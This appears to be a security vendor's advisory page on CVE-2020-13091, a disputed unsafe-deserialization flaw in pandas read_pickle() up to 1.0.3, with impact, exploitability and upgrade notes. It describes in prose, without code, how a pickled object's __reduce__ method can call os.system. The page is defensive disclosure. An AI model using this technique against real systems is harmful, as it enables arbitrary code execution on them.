CVE-2020-13091
Unsafe Deserialization vulnerability in pandas (PyPI)
What is CVE-2020-13091 About?
This disputed vulnerability in pandas through 1.0.3 allows for unserialization and command execution from untrusted files via the `read_pickle()` function. If the `__reduce__` method within the pickled object makes an `os.system` call, arbitrary commands can be executed. While disputed due to the documented unsafety of `read_pickle()`, it highlights a potential for misuse by developers.
Affected Software
Technical Details
The vulnerability stems from the read_pickle() function in pandas through version 1.0.3. This function is designed to deserialize pickled Python objects. If a malicious pickled file is provided, and an object within that file defines a __reduce__ method that, when invoked during deserialization, makes a call to os.system or a similar command execution primitive, then arbitrary commands embedded in the __reduce__ method can be executed on the system. The attack vector specifically targets the Python pickle protocol's ability to reconstruct objects and execute custom code during the process, leading to remote code execution.
What is the Impact of CVE-2020-13091?
Successful exploitation may allow attackers to execute arbitrary code, leading to system compromise, data manipulation, or denial of service.
What is the Exploitability of CVE-2020-13091?
Exploitation requires an attacker to be able to supply a malicious pickled file to an application that uses pandas' read_pickle() function. The complexity of creating such a payload is moderate. There are no authentication requirements to trigger this vulnerability, as it depends on the application's handling of input files. The attack is typically local if the attacker can place the malicious file on the system, or remote if the application downloads and processes untrusted pickled files. The primary risk factor is the application's use of read_pickle() with untrusted data, despite its documented unsafety.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for CVE-2020-13091?
Available Upgrade Options
- pandas
- <1.0.4 → Upgrade to 1.0.4
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_pickle.html
- https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_pickle.html
- https://osv.dev/vulnerability/PYSEC-2020-73
- https://github.com/0FuzzingQ/vuln/blob/master/pandas%20unserialize.md
- https://github.com/0FuzzingQ/vuln/blob/master/pandas%20unserialize.md
What are Similar Vulnerabilities to CVE-2020-13091?
Similar Vulnerabilities: CVE-2019-15820 , CVE-2019-17546 , CVE-2020-8919 , CVE-2020-1749 , CVE-2020-7764
